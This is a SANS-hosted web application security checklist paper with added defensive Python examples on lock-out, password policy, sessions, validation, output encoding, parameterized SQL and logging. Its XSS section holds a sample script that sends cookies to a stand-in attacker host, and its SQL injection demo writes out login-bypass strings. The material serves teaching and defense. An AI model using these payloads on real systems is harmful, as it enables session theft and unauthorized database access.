8/9/2019 Security Checklist Web Application Design 1389 http://slidepdf.com/reader/full/security-checklist-web-application-design-1389 1/90

Copyright SANS Institute

Author Retains Full Rights


Gail Zemanek Bayse
GIAC Security Essentials Certification (GSEC)
Practical Assignment, Version 1.4b

© SANS Institute 2004, As part of the Information Security Reading Room. Author retains full rights.

Abstract

Web applications are very enticing to corporations. They provide quick access to corporate resources, user-friendly interfaces, and effortless deployment to remote users. For the very same reasons web applications can be a serious security risk to the corporation. Unauthorized users can find the same benefits: "quick access," "user-friendly," and "effortless" access to corporate data.

This paper is written for Information Technology professionals who are not programmers and may not be aware of the specific problems presented when using an externally facing web application to attach to a mission critical database. The content provides a description of the security challenges introduced by externally facing web applications. It provides the knowledge necessary to articulate to developers the security requirements for a specific web application, to make contractual the obligation of the developer to build an application that is secure, and to assure that appropriate testing is completed prior to moving to a production environment. The document is structured as a checklist of challenges. For each challenge there are specific checkpoints that delineate the security concern. The checklist provides a basis for securing web applications and the databases they connect to from malicious and unintentional abuse.

Checklist

Risk Assessment
Authentication
Authorization and Access Control
Session Management
Data and Input Validation
Cross Site Scripting (XSS)
Command Injection Flaws
Buffer Overflows
Error Handling
Logging
Remote Administration
Web Application and Server Configuration

Risk Assessment

Challenge:

Not all applications used in a secured Local Area Network (LAN) present additional security risk. It is important to match the security requirements with the risk imposed by the new application. An application that is used by employees solely from within the LAN and streamlines tasks already part of their functional role may require no additional security. However, an externally facing web application used by remote employees, consultants or vendors, attaching to a mission critical database, poses a very different set of concerns. Every data asset must be examined and its confidentiality, criticality and vulnerability assessed. It is crucial to develop security procedures that are appropriate to each asset's criticality and vulnerability. "Security is almost always an overhead, either in cost or performance."[1] Therefore, the goal is to match the level of security with the assessed risk, to assure that the latency caused by security and the dollar amount spent securing an application are realistic and acceptable.

An application determined to be of risk to mission critical data will require a thorough security component during its design phase, in development and implementation, and into maintenance. Use the following questions as checkpoints to determine the level of risk.

Checkpoints:


• Which applications are affected by the requested change?
• Who are the users? Where are the users physically located?
• Will the application attach to mission critical applications? Will it modify any confidential or critical data?
• Will any data considered sensitive or confidential be transmitted over external communication links?
• Where should additional user authentication be built into the application?
• Where will the application be physically located in the network? In the DMZ, or the internal network? Will it be installed on new equipment or share an existing server? Will it coexist well with existing applications?
• If the system was compromised, would it result in financial loss or the loss of reputation? Can you place a dollar amount on any loss?
• What is the history of the OS platform with respect to security?
• What would motivate someone to break into the application?
• Will the application have high external visibility, making it an obvious target to attackers?

Authentication

Challenge:

Authentication is a first line of defense. The application must determine if the user is who he/she claims to be, or if the entity, a server or program, is what it claims to be. This is the "I recognize who you are" stage. The most common form of authentication is the user id and password. Authentication policies, processes, and logging must be designed, developed and documented to assure that the application keeps unauthorized users from accessing the site. It must correctly identify the true owner of a user id and password.

Checkpoints:

To prevent a user id and/or password from being guessed, failed logins should trigger a lock-out after a determined number of attempts. The account lock-out should be maintained for a number of hours to prevent and discourage the attacker from reissuing the attack. The activity should be logged.[2] All authentication attempts should be logged: logins, logouts, failed logins and password change requests. In addition, notification or alerts should be sent to an administrator when an account is locked due to failed logins.
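The lock-out and logging checkpoints above, carried into code. This is an added example written for this edition of the page, not code from the paper or from SANS; the threshold of five attempts, the four-hour lock-out, the user id "bijohn" and the address 203.0.113.7 are assumed values for the demonstration, and the password check is a stand-in for a real salted-hash comparison:

```python
import logging
import time
from dataclasses import dataclass

# Policy values assumed for this example; the paper leaves the exact numbers
# to the application's risk assessment.
MAX_FAILED_ATTEMPTS = 5            # failed logins before the account is locked
LOCKOUT_SECONDS = 4 * 60 * 60      # lock-out held for four hours

log = logging.getLogger("auth")


@dataclass
class Account:
    user_id: str
    password_hash: str             # only a one-way hash is ever stored
    failed_attempts: int = 0
    locked_until: float = 0.0      # epoch seconds; 0.0 means not locked


class Authenticator:
    def __init__(self, accounts, verify_password, alert_admin, clock=time.time):
        self.accounts = accounts                # dict: user_id -> Account
        self.verify_password = verify_password  # callable(stored_hash, candidate) -> bool
        self.alert_admin = alert_admin          # callable(message) -> None
        self.clock = clock                      # injectable so the lock-out can be tested

    def _event(self, kind, user_id, client_ip, outcome, detail=""):
        # Every attempt is recorded with timestamp, user id, source address and result.
        stamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(self.clock()))
        log.info("%s event=%s user=%s ip=%s outcome=%s %s",
                 stamp, kind, user_id, client_ip, outcome, detail)

    def login(self, user_id, password, client_ip):
        now = self.clock()
        acct = self.accounts.get(user_id)
        if acct is None:
            # Same outcome as a wrong password, so the response does not reveal
            # which user ids exist.
            self._event("login", user_id, client_ip, "failure", "unknown user")
            return False
        if acct.locked_until > now:
            # A correct password is still refused while the lock-out is in force.
            self._event("login", user_id, client_ip, "failure", "account locked")
            return False
        if self.verify_password(acct.password_hash, password):
            acct.failed_attempts = 0
            self._event("login", user_id, client_ip, "success")
            return True
        acct.failed_attempts += 1
        self._event("login", user_id, client_ip, "failure",
                    f"failed attempt {acct.failed_attempts}")
        if acct.failed_attempts >= MAX_FAILED_ATTEMPTS:
            acct.locked_until = now + LOCKOUT_SECONDS
            acct.failed_attempts = 0
            self._event("lockout", user_id, client_ip, "locked",
                        f"until {acct.locked_until:.0f}")
            self.alert_admin(f"account {user_id} locked after "
                             f"{MAX_FAILED_ATTEMPTS} failed logins from {client_ip}")
        return False

    def logout(self, user_id, client_ip):
        self._event("logout", user_id, client_ip, "success")


def run_scenario():
    """Constructed walk-through: five wrong passwords lock the account, the correct
    password is then refused, and it is accepted again once the lock-out expires."""
    alerts = []
    fake_now = [1_700_000_000.0]
    accounts = {"bijohn": Account(user_id="bijohn", password_hash="<hash>")}
    # The verifier is a stand-in; a real deployment compares a salted one-way hash.
    auth = Authenticator(accounts,
                         verify_password=lambda stored, cand: cand == "correct horse",
                         alert_admin=alerts.append,
                         clock=lambda: fake_now[0])
    wrong = [auth.login("bijohn", "guess", "203.0.113.7") for _ in range(MAX_FAILED_ATTEMPTS)]
    while_locked = auth.login("bijohn", "correct horse", "203.0.113.7")
    fake_now[0] += LOCKOUT_SECONDS + 1
    after_expiry = auth.login("bijohn", "correct horse", "203.0.113.7")
    unknown = auth.login("nobody", "correct horse", "203.0.113.7")
    return {"wrong": wrong, "while_locked": while_locked,
            "after_expiry": after_expiry, "unknown": unknown, "alerts": alerts}
```

run_scenario() returns the outcomes so they can be checked; in a deployment the `_event` records would go to the central log the Logging section calls for, and the administrator alert to whatever paging or ticketing the site uses.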

An attacker should not be able to deduce the user id. "Bill.Johnson" would not be considered a strong user id, while "bijohn" would be less obvious. Likewise, strong password rules should be applied. A strong password has a minimum of seven characters and uses three of the following: numbers, upper case letters, lower case letters, and symbols. It will have a symbol character in the second through sixth position. A strong password will not use repeated or sequenced characters. It will look random. Finally, the password should not be found in any dictionary.
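The password rules in the paragraph above as an executable policy check. This is an added example, not the paper's own code; the word list, the three-character run length used to detect repeated or sequential characters, and the reading of "second through sixth position" as string indexes 1 to 5 are assumptions made here:

```python
import string

# Constructed word list standing in for the dictionary the paper refers to.
DICTIONARY = {"password", "welcome", "letmein", "baseball", "secret"}

MIN_LENGTH = 7
MIN_CLASSES = 3
SYMBOLS = set(string.punctuation)


def _has_run(pw, length=3):
    """True if `length` consecutive characters are identical (aaa) or step by exactly
    one code point in either direction (abc, 321)."""
    for i in range(len(pw) - length + 1):
        codes = [ord(c) for c in pw[i:i + length]]
        steps = {b - a for a, b in zip(codes, codes[1:])}
        if steps in ({0}, {1}, {-1}):
            return True
    return False


def check_password(pw):
    """Return the list of policy violations; an empty list means the password passes."""
    problems = []
    if len(pw) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    classes = sum([
        any(c.isdigit() for c in pw),
        any(c.isupper() for c in pw),
        any(c.islower() for c in pw),
        any(c in SYMBOLS for c in pw),
    ])
    if classes < MIN_CLASSES:
        problems.append(f"uses {classes} character classes, needs {MIN_CLASSES}")
    # "a symbol character in the second through sixth position": indexes 1..5
    if not any(c in SYMBOLS for c in pw[1:6]):
        problems.append("no symbol in positions 2-6")
    if _has_run(pw):
        problems.append("contains repeated or sequential characters")
    # Dictionary check on the whole string and on its letters-only core, lower-cased,
    # so that "Password1!" is still caught.
    core = "".join(c for c in pw if c.isalpha()).lower()
    if pw.lower() in DICTIONARY or core in DICTIONARY:
        problems.append("found in dictionary")
    return problems
```

Returning every violation rather than stopping at the first lets the change-password page tell the user all of what must be fixed in one round trip.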

Implement a password expiry time for all passwords. The more critical an application is deemed, the more often the password should change. For applications requiring a highly secure system, consider two-factor authentication. This is a token or fob with a code that changes automatically at a fixed interval. It is something you have (the token's changing code) and something you know (a PIN or passcode), together with your user id.[4]

When a password is changed, require the existing password to be entered prior to accepting a new password. It is important to verify that the owner of the user id is the person requesting the password change. When passwords are successfully changed, the program should forward a message to the email address of the owner of the user id, and the user should be forced to re-authenticate.

When a user forgets a password, the password must be changed rather than "recovered." Passwords should not be stored in a manner that would allow a recovery. On form based password resets, the use of "secret" questions and answers is recommended. Note that answers to such questions are frequently guessable or publicly discoverable, so they should back up, not replace, a reset link sent to a verified address or a second factor. Again, the application should force a new authentication following the password reset.[5]


Passwords and user ids must be transmitted and stored in a secure manner. Do not send user ids and passwords in a clear-text email message. Should this be a necessity, the transmission must be protected with Secure Socket Layer (SSL) encryption rather than sent in the clear. Any list of passwords should be hashed (one-way hash) to assure that an attacker is unable to read authentication information. For applications that require intense security, consider combining a randomly generated salt value with the password hash. Salt is "random data included as part of a session key. Salt values are added to increase the work required to mount a brute-force (dictionary) attack" against authentication credentials. A per-user random salt combined with a deliberately slow hash (PBKDF2, bcrypt, scrypt or Argon2) is now the expected baseline for every application, not only the most sensitive ones. If user accounts are required to be exposed, i.e., in a drop-down box, then an alias must be used to protect the user id.

Best practice recommends encrypting the entire logon transaction with SSL. Forms-based authentication must use a POST request to assure that the authentication credentials are not cached to browser history.[6] SSL on all login pages protects the credentials in transit; the POST request keeps them out of the browser history and out of server and proxy logs. Make use of "no cache" tags to further prevent someone from backing up to a login page and resubmitting a logon. Do not allow the application to cache both user id and password. "Remember me" functionality is not recommended, but if used should allow users to automatically sign in only to non-critical portions of the site.

Note on SSL:

SSL can provide authentication, confidentiality, and integrity for data as it is transported to and from web services. It is important to recognize that SSL doesn't protect the web application. It protects the "transport" of the data as it moves between the web application server and a browser. SSL is a transport layer protocol that operates between the TCP/IP layer and the Application layer where HTTP operates. Being aware of where SSL encryption is implemented will reduce any false sense of security developers may have when using SSL to secure an application.

Authorization and Access Control

Challenge:

Authentication tells a user "I recognize you as a user." Authorization says "Now that I know who you are, I also know what you are allowed to do, and what data you are allowed to see and modify." Access control determines where a user can connect from, what time they can connect, and the type of encryption required. The goal is to develop a security strategy to protect back-end and front-end data and systems. This can be accomplished through the use of roles, credentials, and sensitivity labels.

Checkpoints:

During the design phase, user roles should be defined based on a "least privilege" model. If a user role will not be modifying data, then the role should not be given any opportunity to edit, delete, or add data to the critical database. Document the user roles during development and determine who will hold the responsibility for assigning users to specific roles.

The designers of the web application should have available to them complete documentation of the mission critical database at the conception of the project's design. It should include a description of all fields and tables, data length and expected values for a field, and any permissions assigned to the field.

Assure that users cannot "browse" past their user role rights. The user should not be able to access an unauthorized page by entering the location into the URL. Similarly, a user should not be able to enter a file path (\\servername\winnt\drivers) into a URL that would allow a user to access and potentially modify a system file.

Assure that users' activity is not cached when handling sensitive information. If multiple employees share a workstation, clicking the back arrow should not take a user to the URL of the last user's login or their last pages visited. This may result in elevated rights.

Use file system access rights only as a last defense.

Testing of an application prior to moving it into a production environment will include a review of user role documentation and a review of the code implementing access controls. Penetration testing will be necessary to assure that every access control has been tested and prevents unauthorized access.[7]
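Role-based authorization and the URL/file-path check from the checkpoints above, as an added example that is not the paper's code. The role table, the DOCUMENT_ROOT location, the record handlers and the user ids are assumptions for the illustration:

```python
import os
from functools import wraps

# Roles defined on a least-privilege model: a role that never changes data gets
# no permission that could add, edit or delete it.
ROLE_PERMISSIONS = {
    "viewer": {"read"},
    "editor": {"read", "write"},
    "admin": {"read", "write", "delete", "assign_roles"},
}


class AccessDenied(Exception):
    pass


def can(user, action):
    """Boolean form of the role check, for callers that hide rather than refuse a function."""
    return action in ROLE_PERMISSIONS.get(user.get("role"), set())


def requires(permission):
    """Decorator: the handler runs only if the caller's role grants `permission`.
    The check lives on the server, so typing the handler's URL directly cannot bypass it."""
    def decorator(handler):
        @wraps(handler)
        def wrapper(user, *args, **kwargs):
            if not can(user, permission):
                raise AccessDenied(f"{user.get('id')} ({user.get('role')}) lacks {permission}")
            return handler(user, *args, **kwargs)
        return wrapper
    return decorator


@requires("read")
def view_record(user, record_id):
    return f"record {record_id} shown to {user['id']}"


@requires("delete")
def delete_record(user, record_id):
    return f"record {record_id} deleted by {user['id']}"


# Directory the application is allowed to serve files from (assumed location).
DOCUMENT_ROOT = os.path.realpath("/srv/app/public")


def resolve_public_path(requested):
    """Map a path taken from the URL onto DOCUMENT_ROOT and refuse anything that would
    escape it: '..' segments, UNC names such as \\\\server\\share, embedded NUL bytes."""
    if "\x00" in requested or requested.startswith("\\\\") or requested.startswith("//"):
        raise AccessDenied("malformed path")
    relative = requested.replace("\\", "/").lstrip("/")
    candidate = os.path.realpath(os.path.join(DOCUMENT_ROOT, relative))
    # realpath has collapsed any '..'; the result must still sit under the root.
    if os.path.commonpath([DOCUMENT_ROOT, candidate]) != DOCUMENT_ROOT:
        raise AccessDenied(f"path escapes document root: {requested!r}")
    return candidate


def is_safe_path(requested):
    try:
        resolve_public_path(requested)
        return True
    except AccessDenied:
        return False
```

The decorator is the enforcement point the penetration tester exercises: every handler that touches critical data carries one, and the test is to call each handler's URL with each role and confirm the refusals.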

Session Management

Challenge:

A common vulnerability of web applications is caused by not protecting account credentials and session tokens. There are four types of session id attacks: interception, prediction, brute-force, and fixation. In each attack, an unauthorized user can hijack a session and assume the valid user's identity. Encrypting sessions is effective against interception; randomly assigned session ids protect against prediction; long keyspaces render brute-force attack less successful; and forcing assignment and frequent regeneration of session ids make fixation less problematic.[11]

HTTP is a stateless protocol. It will answer any HTTP request. HTTP does not, by itself, keep conversations in any specific order. It is important to use a state mechanism to separate and maintain an individual user's activities within a session. A cookie is a common vehicle used to maintain state in HTTP sessions. The cookie allows a user to make numerous HTTP transactions in one conversation. The session id keeps the various requests together in one conversation.[12]

Checkpoints:

Session ids should be protected with SSL. Session ids should change routinely and always during major transitions, i.e., when moving to and from SSL and when authenticating. For highly secure transactions, re-authentication and a new session id should be issued prior to processing the requested transaction.

On log out, the session id should be over-written: invalidated on the server, not merely cleared from the browser, so that a captured id cannot be replayed.
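A server-side session store implementing the checkpoints above: server-assigned random ids, rotation on authentication, invalidation on logout, and an idle timeout. This is an added example, not from the paper; the 32-byte id length, the 15-minute idle timeout and the cookie name are assumed values:

```python
import secrets
import time

SESSION_ID_BYTES = 32   # 256 bits of randomness: unpredictable, and a keyspace too large to brute-force
IDLE_TIMEOUT = 15 * 60  # assumed idle timeout in seconds


class SessionStore:
    """Server-side session table. The server, never the client, chooses every id."""

    def __init__(self, clock=time.time):
        self._sessions = {}     # session id -> {"user": str or None, "last_seen": float}
        self.clock = clock

    def _new_id(self):
        return secrets.token_urlsafe(SESSION_ID_BYTES)

    def create(self):
        """Anonymous session for a visitor who has not logged in yet."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "last_seen": self.clock()}
        return sid

    def lookup(self, sid):
        """Return the session state, or None if the id is unknown or has sat idle too long."""
        state = self._sessions.get(sid)
        if state is None:
            return None
        if self.clock() - state["last_seen"] > IDLE_TIMEOUT:
            self.destroy(sid)
            return None
        state["last_seen"] = self.clock()
        return state

    def rotate(self, sid):
        """Move the state under a fresh id; the old id stops working at once."""
        state = self._sessions.pop(sid)
        new_sid = self._new_id()
        self._sessions[new_sid] = state
        return new_sid

    def authenticate(self, sid, user):
        """Called on successful login: bind the user to the session and rotate the id, so an
        id an attacker planted before login (fixation) is worthless afterwards."""
        state = self.lookup(sid)
        if state is None:
            raise KeyError("unknown or expired session")
        state["user"] = user
        return self.rotate(sid)

    def destroy(self, sid):
        """Called on logout: the id is invalidated here, not merely cleared in the browser."""
        self._sessions.pop(sid, None)


def session_cookie(sid):
    """Cookie attributes: Secure (sent only over SSL/TLS), HttpOnly (not readable by page
    script), SameSite (not sent on cross-site requests). The cookie name is an assumption."""
    return f"SESSIONID={sid}; Path=/; Secure; HttpOnly; SameSite=Strict"
```

The same `rotate` call serves the paper's other transition points: call it when the user moves into or out of SSL and before a highly sensitive transaction, after re-authentication.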

Data and Input Validation

Challenge:

Cross-Site Scripting and Command Injection take advantage of a "violation of trust"[16] between a user accessing a known and trusted site and an attacker. The attacker bypasses security mechanisms by adding malicious code to open parameters in an application. An open parameter could be a URL, QueryString, Header, Cookie, Form Field, or a Hidden Field. It is any parameter that does not assure that the data entered is data that would normally be expected. For example, if the parameter is a date field, and the input "injected" into it is a script file, then the attacker has been successful in finding and using an open parameter. Well-written code would discard the script. The importance of knowing and documenting what is known as valid data cannot be stressed enough.

Checkpoints:

The strongest defense against these attacks is Input Validation. If the server validates all data entering the web application against known good criteria, the chances of successful attack are greatly reduced. The burden of security validation must fall on the server, and hence the application developer, rather than the client. Client-side validation is often used as a primary validation to "reduce round trips to the server," but should not be used as a security defense. The use of a common library of field validations can more efficiently and accurately confirm the integrity of the entry data.

• Constrain input: decide what is allowed in the field.
• Validate data type, length, format, and range.
• Reject "known bad" input, but do not rely only on this, as it assumes the programmer knows everything that could possibly be malicious.
• Sanitize input: this can include stripping a null from the end of a user-supplied string, escaping values so they are treated as literals, and HTML or URL encoding to wrap data and treat it as a literal.[17]

Make strict use of canonicalization. Know what the server is expecting in every field. All data input must be reduced to a pure format, the format that the server and database expect. Input validation assures that all data is appropriate for its meaningful purpose. It may be necessary to establish character sets on the server to establish the canonical form that input must take.

As noted in the Authentication section, an SSL connection operates at the transport layer; the malicious input travels inside it. It is important to recognize that SSL does not protect against invalid data. The SSL connection sees a valid conversation between server and user and transports the malicious code.
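An allow-list validation layer following the checkpoints above: canonicalize first (NUL stripping, Unicode normalization, length limit), then check type, length, format and range field by field, on the server. This is an added example, not the paper's code; the three fields, their patterns and their ranges are assumptions for the illustration:

```python
import re
import unicodedata
from datetime import date


class ValidationError(ValueError):
    pass


def canonicalize(raw, max_len):
    """Reduce input to the one form the checks expect before an
ything else looks at it:
    drop embedded NULs, normalize Unicode (full-width digits become ASCII digits,
    compatibility characters fold to their plain forms), trim, and bound the length."""
    if not isinstance(raw, str):
        raise ValidationError("expected text")
    value = raw.replace("\x00", "")
    value = unicodedata.normalize("NFKC", value).strip()
    if len(value) > max_len:
        raise ValidationError(f"longer than {max_len} characters")
    return value


# Allow-list patterns: state what IS valid instead of guessing what might be malicious.
USERNAME_RE = re.compile(r"^[a-z][a-z0-9_]{2,15}$")   # assumed username format
DIGITS_RE = re.compile(r"^[0-9]+$")                     # ASCII digits only, not any Unicode digit


def validate_username(raw):
    value = canonicalize(raw, 16).lower()
    if not USERNAME_RE.match(value):
        raise ValidationError("username: 3-16 characters, letters, digits and underscore")
    return value


def validate_order_date(raw):
    """Type and range check: an ISO date inside an assumed business range."""
    value = canonicalize(raw, 10)
    try:
        parsed = date.fromisoformat(value)
    except ValueError:
        raise ValidationError("order_date: expected YYYY-MM-DD") from None
    if not date(2000, 1, 1) <= parsed <= date(2100, 12, 31):
        raise ValidationError("order_date: out of range")
    return parsed


def validate_quantity(raw):
    value = canonicalize(raw, 6)
    if not DIGITS_RE.match(value):
        raise ValidationError("quantity: digits only")
    qty = int(value)
    if not 1 <= qty <= 10_000:
        raise ValidationError("quantity: must be between 1 and 10000")
    return qty


VALIDATORS = {
    "username": validate_username,
    "order_date": validate_order_date,
    "quantity": validate_quantity,
}


def validate_form(fields):
    """Run every field through its validator on the server. Returns (clean, errors); the
    caller rejects the whole submission unless `errors` is empty."""
    clean, errors = {}, {}
    for name, validator in VALIDATORS.items():
        try:
            clean[name] = validator(fields.get(name, ""))
        except ValidationError as exc:
            errors[name] = str(exc)
    return clean, errors
```

Note that the length check runs after normalization: a full-width or composed string can be shorter or longer once canonicalized, and the limit must apply to the form the database will actually receive.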

Cross Site Scripting (XSS)

Challenge:

When a web application creates output from user input without validating the data, the output can include malicious code. An attacker looks for instances in code where there is no validation and inserts the attack at that point. The output that the user receives may well carry malicious code. The user may receive a "click here" message and, trusting the "known site," abide by the hacker's desire. The result is directed at the end user rather than the application's infrastructure. This could transmit corporate confidential data to an outside site. It can result in program installations or disclosure of end user files.[21]
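Output encoding as the XSS defense, contrasting a handler that reflects input unencoded with handlers that encode for the HTML text, attribute and URL contexts. This is an added example, not from the paper; the page fragments and the script payload are constructed for the demonstration:

```python
import html
from urllib.parse import quote

# Constructed reflected-XSS payload: what an attacker would place in a "name" parameter.
PAYLOAD = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'


def render_greeting_unsafe(name):
    """Vulnerable: the parameter goes straight into the page, so the browser runs it."""
    return f"<p>Welcome back, {name}!</p>"


def render_greeting(name):
    """Hardened: every character with meaning to the HTML parser becomes an entity, so the
    same input is displayed as text instead of being parsed as markup."""
    return f"<p>Welcome back, {html.escape(name, quote=True)}!</p>"


def render_search_box(previous_query):
    """Attribute context: quotes must be escaped too, or the input can close the attribute
    and add an event handler of its own."""
    return f'<input name="q" value="{html.escape(previous_query, quote=True)}">'


def render_login_link(label, next_url):
    """Two contexts in one element: URL-encode the value inside the query string, then
    HTML-encode the finished href and the link text."""
    href = "/login?next=" + quote(next_url, safe="")
    return f'<a href="{html.escape(href, quote=True)}">{html.escape(label, quote=True)}</a>'


def contains_live_script(markup):
    """Crude check used by the demonstration: an unescaped <script tag reached the output."""
    return "<script" in markup.lower()
```

Input validation (previous section) and output encoding are complementary: validation rejects what the field should never hold, encoding makes whatever is stored harmless in the context where it is written out.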


Command Injection Flaws

Challenge:

Command injection flaws allow attackers to relay malicious code through the web application to another system. The malicious code can include whole scripts. SQL injection is the most prevalent. SQL injection attaches specifically to a parameter that passes through to an SQL database, allowing an attacker to modify, erase, copy, or corrupt an entire database. SQL injections can take the following forms: Authorization (Authentication), Select Statement, Insert, and SQL Server Stored Procedures.[24]

Checkpoints:


Review for SQL injection is time consuming. All parameters must be examined for calls to external sources. Review the code for any instance where input from an HTTP request could be written into any of these external calls.

Build filters that verify that only expected data is included. If symbols are required, assure that they are converted to HTML entities.

Prepend and append a quote to all user input so that it is handled as a string literal. Quoting alone is not a reliable defense, since an input containing its own quote character can still terminate the literal; parameterized queries (bind variables), which keep the SQL text fixed and pass the input purely as data, are the dependable control.

SQL Server comes with a variety of stored procedure calls. Many are not used in specific applications. Give users access to only the SQL stored procedures that are required. All others should be stored away from the web application.[25]

Wherever possible avoid shell commands and system calls. In many cases there are language libraries that perform the same functions without using a system shell interpreter. Where shell commands cannot be avoided, the code must validate the input against a valid input list to ensure that it does not include malicious code. Consider all supplied input as data, reducing, though not eliminating, external calls.

In the event of data that is not acceptable, there should be a mechanism in place to block and time out the session.
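SQL injection in the authorization (authentication) form the paper lists, shown against an in-memory SQLite table beside the parameterized query that defeats it. This is an added example, not the paper's code; the table, its two rows and the payloads are constructed for the demonstration:

```python
import sqlite3


def build_db():
    """Constructed in-memory table standing in for the mission critical database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT PRIMARY KEY, password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("bijohn", "hash-of-bijohn-pw", "viewer"), ("admin", "hash-of-admin-pw", "admin")],
    )
    return conn


def login_vulnerable(conn, user_id, password_hash):
    """String concatenation: whatever the user typed becomes part of the SQL the engine parses."""
    sql = ("SELECT user_id, role FROM users WHERE user_id = '" + user_id
           + "' AND password_hash = '" + password_hash + "'")
    return conn.execute(sql).fetchone()


def login_parameterized(conn, user_id, password_hash):
    """Placeholders: the SQL text is fixed; the values travel separately and can only be data."""
    sql = "SELECT user_id, role FROM users WHERE user_id = ? AND password_hash = ?"
    return conn.execute(sql, (user_id, password_hash)).fetchone()


# Payloads constructed for the demonstration.
COMMENT_OUT_PASSWORD = "admin' --"      # closes the literal and comments out the password test
ALWAYS_TRUE = "' OR '1'='1"             # makes the WHERE clause true for every row


def run_demo():
    conn = build_db()
    results = {
        # Attacker logs in as admin without knowing any password.
        "vulnerable_as_admin": login_vulnerable(conn, COMMENT_OUT_PASSWORD, "anything"),
        # Attacker gets some account back without knowing any credential at all.
        "vulnerable_any_row": login_vulnerable(conn, ALWAYS_TRUE, ALWAYS_TRUE),
        # The same payloads against the parameterized query match no row.
        "parameterized_payload": login_parameterized(conn, COMMENT_OUT_PASSWORD, "anything"),
        "parameterized_any_row": login_parameterized(conn, ALWAYS_TRUE, ALWAYS_TRUE),
        # A legitimate login still works.
        "parameterized_legit": login_parameterized(conn, "bijohn", "hash-of-bijohn-pw"),
    }
    conn.close()
    return results
```

The same principle carries to the paper's stored-procedure advice: a procedure's parameters are bound, not spliced into query text, and the application's database login should hold execute rights on only the procedures it needs.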

Buffer Overflows

Challenge:

"The buffer overflow attack involves sending large amounts of data that exceed the quantities expected by the application within a given field. Such attacks cause the application to abandon its normal behavior and begin executing commands on behalf of the attacker."[26]

Attackers find buffer overflow vulnerabilities by searching for system calls and functions that do not restrict the length and type of input. This can be done manually or electronically with a code inspection tool. The attacker can also run a brute force attack (today usually called fuzzing) against the program in the hope of finding vulnerabilities in the code. Once the attacker finds a vulnerability, custom code is inserted that does not crash the system, but rather instructs it to execute other commands or programs of the attacker's desire.

Checkpoints:

All code that accepts input from users via an HTTP request must be reviewed to ensure that it can identify large input. Once inappropriate data is identified, the activity must be logged and the data dropped.

All data input fields must have reasonable field lengths and specific data types. Limit the amount of text allowed in free form fields.

Routinely check the code of web applications during their development phase to assure that the design is secured as built.

Insecure Use of Cryptography

Challenge:

Apply encryption to any part of the program that affects critical or confidential data. Assure that all elements of encryption are securely stored. Encryption schemes should come from an established, publicly reviewed vendor or library rather than be developed internally.

Encryption is fairly easy to add to an application, but it is often not done correctly. Some common mistakes are:

• Insecure storage of keys, certificates, and passwords
• Improper storage of secrets in memory


Error Handling

Thoroughly test the application to determine the possible errors. Decide what the programmatic response will be to known errors. Write error pages that reflect enough information to the end user without giving the user information about the code, the file system, or permissions.

When an error occurs that causes the program or a part of the program to fail, it is vital that the system will "fail closed," blocking an unauthorized user from reaching the operating system or the site. The action that caused the error should be logged and then blocked.
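Fail-closed error handling and a generic error response, as the checkpoints above require. This is an added example, not from the paper; the broken report handler and the unreachable permission lookup are constructed stand-ins for real failures:

```python
import logging
import uuid

log = logging.getLogger("app")


class RequestDenied(Exception):
    pass


def authorized(user, resource, lookup):
    """Fail closed: if the permission lookup itself breaks (database down, bad data),
    the answer is 'no', never 'yes by default'. The failure is logged with full detail."""
    try:
        return bool(lookup(user, resource))
    except Exception:
        log.exception("authorization lookup failed for user=%s resource=%s", user, resource)
        return False


def handle(handler, request):
    """Run a request handler and turn every failure into a response that gives the end user
    no code, path, query or permission detail. Returns (status, body)."""
    try:
        return 200, handler(request)
    except RequestDenied as exc:
        log.warning("denied request=%s reason=%s", request, exc)
        return 403, "Access denied."
    except Exception:
        # Full detail goes to the server log under a reference id; the user sees only the id,
        # which support staff can match against the log entry.
        ref = uuid.uuid4().hex[:8]
        log.exception("unhandled error ref=%s request=%s", ref, request)
        return 500, f"The request could not be completed. Reference {ref}."


# Constructed stand-ins for the failures a real handler or lookup might produce.
def broken_report_handler(request):
    raise FileNotFoundError(f"/var/www/app/reports/{request['id']}.xml: No such file or directory")


def denied_handler(request):
    raise RequestDenied("viewer role cannot export")


def broken_lookup(user, resource):
    raise ConnectionError("permissions database unreachable")
```

The exception text that reaches the log here is exactly the kind of detail (absolute path, file name, table name) that must never reach the browser; the reference id is what ties the two apart.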

rights

&ogging

ull


Description

Log all Authentication and Authorization Events: logging in, logging out, failed logins. These should include date/time, success/failure, the resources being authorized, the user requesting the authorization and, if appropriate, the IP address or location of the authentication attempt.

Log all Administrator activity. All of it.

Log the deletion of any data.

Log any modification to data characteristics: permissions, location, field type.

Log files are critical data. They should be encrypted. If your environment is highly secure, consider WORM technology to protect the log files from deletion or modification.


Develop a procedure for archiving log files. Consider encrypting this critical data.
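An audit logger for the events listed in this section, as an added example that is not code from the paper: each record carries the fields the checklist names, and records are chained with a SHA-256 hash so that a modified or deleted entry is detected on verification. The hash chain is this example's addition to the checklist's encryption and WORM advice; the event names, users and addresses are constructed.

```python
import hashlib
import json
from datetime import datetime, timezone

# Added example, not code from the paper: an audit logger for the events the
# checklist says to record. Every record carries the fields the checklist
# lists (date/time, event, success/failure, user, resource, client address),
# and each record is chained to the previous one by a SHA-256 hash so that a
# modified or deleted entry is detected on verification. The chain is this
# example's addition; it complements encryption and WORM storage, it does not
# replace them.

REQUIRED = ("ts", "event", "outcome", "user", "resource", "client_ip")
GENESIS = "0" * 64  # "previous hash" of the first record


class AuditLog:
    """Append-only, hash-chained audit records, one JSON line each."""

    def __init__(self):
        self.lines = []
        self.last_hash = GENESIS

    def record(self, event, outcome, user, resource, client_ip, **detail):
        # event e.g. "auth.login", "auth.logout", "authz.check",
        # "admin.config_change", "data.delete", "data.modify"
        rec = {
            "ts": datetime.now(timezone.utc).isoformat(timespec="seconds"),
            "event": event, "outcome": outcome, "user": user,
            "resource": resource, "client_ip": client_ip,
            "prev": self.last_hash,
        }
        rec.update(detail)  # e.g. permissions, location, field_type
        missing = [f for f in REQUIRED if not rec.get(f)]
        if missing:
            raise ValueError("audit record missing fields: %s" % ", ".join(missing))
        payload = json.dumps(rec, sort_keys=True, separators=(",", ":"))
        digest = hashlib.sha256(payload.encode("utf-8")).hexdigest()
        self.lines.append(payload + " " + digest)
        self.last_hash = digest
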